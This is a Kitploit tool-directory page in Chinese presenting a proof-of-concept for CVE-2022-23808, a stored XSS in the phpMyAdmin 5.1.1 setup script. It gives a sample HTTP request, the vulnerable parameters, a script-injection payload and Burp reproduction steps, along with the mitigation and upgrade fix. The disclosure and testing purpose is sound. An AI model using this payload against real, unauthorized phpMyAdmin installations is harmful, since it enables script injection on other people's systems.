Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-23808 — 针对 CVE-2022-23808 的概念验证漏洞利用程序,该漏洞是 phpMyAdmin 5.1.1 设置脚本中的存储型 XSS 漏洞,包含用于安全测试的有效载荷和复现步骤。 | Kitploit
工具/GitHubGitHub/dipakpanchal05/cve-2022-23808
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试红队
GitHubdipakpanchal05/cve-2022-23808

CVE-2022-23808

针对 CVE-2022-23808 的概念验证漏洞利用程序,该漏洞是 phpMyAdmin 5.1.1 设置脚本中的存储型 XSS 漏洞,包含用于安全测试的有效载荷和复现步骤。

查看仓库
1142341年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

phpMyAdmin 利用

利用标题: phpMyAdmin 5.1.1 - XSS(跨站脚本攻击)
利用作者: Dipak Panchal (@th3.d1p4k)
供应商主页: https://www.phpmyadmin.net
软件下载链接: https://www.phpmyadmin.net/files/5.1.1/
受影响版本: 5.1分支中早于5.1.2的phpMyAdmin版本受影响。
测试环境: Windows 10 和 Linux
CVE: CVE-2022-23808
参考: https://www.phpmyadmin.net/security/PMASA-2022-2/

描述:

发现了一系列漏洞,攻击者可能利用这些漏洞向安装脚本的某些方面注入恶意代码,从而导致XSS或HTML注入。

请求:

root@kitploit:~
GET /phpmyadmin/setup/index.php?page=servers&mode=test&id=test  HTTP/1.1      
Host: 127.0.0.1:1234       
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0      
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8      
Accept-Language: en-US,en;q=0.5     
Connection: close   
Cookie: pma_lang=en; phpMyAdmin=fs55xxxxxxx; pma_lang=en; pmaUser-1=xxxxxxxxxxxxxxxxxxxxxxxxxxx; phpMyAdmin=xxxxxxxxxxxxxxx; pmaAuth-1=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx           
Upgrade-Insecure-Requests: 1          
Cache-Control: max-age=0          

漏洞参数:

  • mode
  • id

有效载荷:

root@kitploit:~
">'><script>alert(document.domain)</script>

复现步骤:

  1. 在Burp中捕获上述请求。
  2. 将XSS有效载荷替换/更改到漏洞参数中。
  3. 点击发送并在浏览器中查看响应。
  4. 你将看到弹窗!

概念验证:

2022-01-26_21h45_23

缓解措施:

配置了 config.inc.php 文件的 phpMyAdmin 安装将不允许访问安装脚本,从而缓解此攻击。

修复:

升级到 phpMyAdmin 5.1.2 或更高版本,或应用补丁。

下载工具